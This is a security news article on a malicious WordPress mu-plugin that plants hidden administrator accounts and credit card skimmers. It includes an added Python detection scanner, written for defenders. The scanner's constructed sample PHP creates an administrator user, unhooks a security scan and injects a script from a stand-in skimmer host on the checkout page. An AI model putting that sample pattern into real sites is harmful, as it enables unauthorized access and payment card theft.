Cybersecurity researchers have uncovered a malicious WordPress plugin capable of creating unauthorized administrator accounts and injecting harmful JavaScript code designed to siphon credit card information. This activity is linked to a broader Magecart campaign specifically targeting e-commerce platforms, as reported by Sucuri.

According to security analyst Ben Martin, the rogue plugin employs deceptive tactics to disguise its true intent. “It contains misleading comments at the top of the code, falsely claiming to be ‘WordPress Cache Addons,’” he stated, underlining the lengths to which attackers will go for legitimacy.

Malicious plugins often infiltrate WordPress sites either through a compromised admin account or by exploiting flaws in existing plugins. Once installed, this malware embeds itself within the mu-plugins (must-use plugins) directory, whose contents WordPress loads automatically and which cannot be deactivated from the regular plugin screen, effectively concealing its presence from site administrators.

Martin elaborated on the plugin’s persistent nature, explaining that removing it is especially challenging as it unregisters common callback functions used by legitimate plugins. Furthermore, the fraudulent plugin can establish hidden administrator accounts, allowing attackers sustained access without drawing attention.

The ultimate goal of this campaign is to introduce credit card skimming malware on checkout pages, exfiltrating sensitive data to a domain controlled by the attackers. This is particularly alarming given that a significant number of WordPress infections arise from compromised administrator users, emphasizing the importance of maintaining strict access controls.
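To give defenders a concrete starting point, here is an added example (not Sucuri's code and not part of the original report): a Python scan of a site's mu-plugins directory that scores each PHP file against indicator patterns for the behaviours described above, namely a misleading plugin header, administrator account creation, unregistered callbacks, and an external script injected on a checkout hook. The indicator patterns, the hit threshold, and the two sample PHP files are constructed assumptions for this example.

```python
import re
import tempfile
from pathlib import Path

# Each pattern corresponds to one behaviour the article attributes to the rogue plugin
# (constructed heuristics for this example, not a vetted signature set).
INDICATORS = {
    "creates_user": re.compile(r"\b(wp_create_user|wp_insert_user)\s*\("),
    "grants_admin": re.compile(r"\b(set_role|add_role)\s*\(\s*['\"]administrator['\"]"),
    "unregisters_hooks": re.compile(r"\b(remove_action|remove_filter)\s*\("),
    "external_script": re.compile(r"<script[^>]*\bsrc\s*=\s*['\"]https?://", re.I),
    "checkout_hook": re.compile(r"woocommerce_(checkout|review_order|thankyou)"),
    "obfuscation": re.compile(r"\b(base64_decode|gzinflate|str_rot13|eval)\s*\("),
}

def scan_file(path: Path) -> dict:
    """Return the header plugin name and the indicators matched in one PHP file."""
    text = path.read_text(errors="replace")
    name = re.search(r"Plugin Name:\s*(.+?)\s*(?:\*/|\n)", text)
    return {
        "file": path.name,
        "plugin_name": name.group(1) if name else None,
        "hits": [k for k, rx in INDICATORS.items() if rx.search(text)],
    }

def scan_mu_plugins(mu_dir, threshold: int = 3) -> list:
    """Scan every *.php in the mu-plugins directory; flag files with >= threshold hits."""
    results = []
    for php in sorted(Path(mu_dir).glob("*.php")):
        r = scan_file(php)
        r["suspicious"] = len(r["hits"]) >= threshold
        results.append(r)
    return results

def build_sample_dir() -> str:
    """Constructed mu-plugins directory: one benign helper, one file mimicking the indicators."""
    d = Path(tempfile.mkdtemp())
    (d / "cache-helper.php").write_text(
        "<?php\n/* Plugin Name: Cache Helper */\n"
        "add_action('init', 'ch_warm_cache');\n")
    (d / "wp-cache-addons.php").write_text(
        "<?php\n/* Plugin Name: WordPress Cache Addons */\n"
        "$id = wp_create_user('svc', $pw); (new WP_User($id))->set_role('administrator');\n"
        "remove_action('admin_init', 'security_plugin_scan');\n"
        "add_action('woocommerce_review_order_before_submit', function () {\n"
        "  echo '<script src=\"https://skimmer.example.invalid/j.js\"></script>'; });\n")
    return str(d)

if __name__ == "__main__":
    print(scan_mu_plugins(build_sample_dir()))
```

Point `scan_mu_plugins` at a real `wp-content/mu-plugins` path to review a live site; a high score is a prompt for manual review, not proof of compromise.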

This revelation comes shortly after warnings surfaced regarding a phishing campaign that misleads users about unrelated security vulnerabilities, pushing them to install a harmful plugin presented as a security patch. Sucuri highlighted that attackers often exploit the “reserved” status of a CVE identifier (one that has been assigned but has no public details yet), indicating the evolving tactics used in these campaigns.

The security firm also noted another Magecart operation that employs a different methodology, utilizing the WebSocket protocol to inject skimmer code into online stores. This malware activates when users unwittingly click on fake “Complete Order” buttons deceptively overlaid on legitimate ones.

In a recent report, Europol characterized digital skimming as an enduring threat resulting in significant theft and misuse of credit card data. It detailed a shift in tactics from front-end malware to back-end solutions, complicating detection efforts for site administrators.

Efforts to counteract these threats resulted in Europol notifying 443 online merchants that their customers’ payment card data had been compromised. Group-IB, collaborating with Europol, documented 23 families of JavaScript-based sniffers, utilized across various sectors and countries, signifying the widespread nature of this cybercrime.

In summary, the detection and reporting of this rogue WordPress plugin underline critical vulnerabilities within e-commerce sites. The tactics employed by the attackers reflect various techniques categorized in the MITRE ATT&CK framework, including initial access through compromised credentials, persistence via mu-plugins, and privilege escalation through hidden administrator accounts. As the cybersecurity landscape evolves, business owners must remain vigilant and proactive in securing their platforms against such sophisticated attacks.
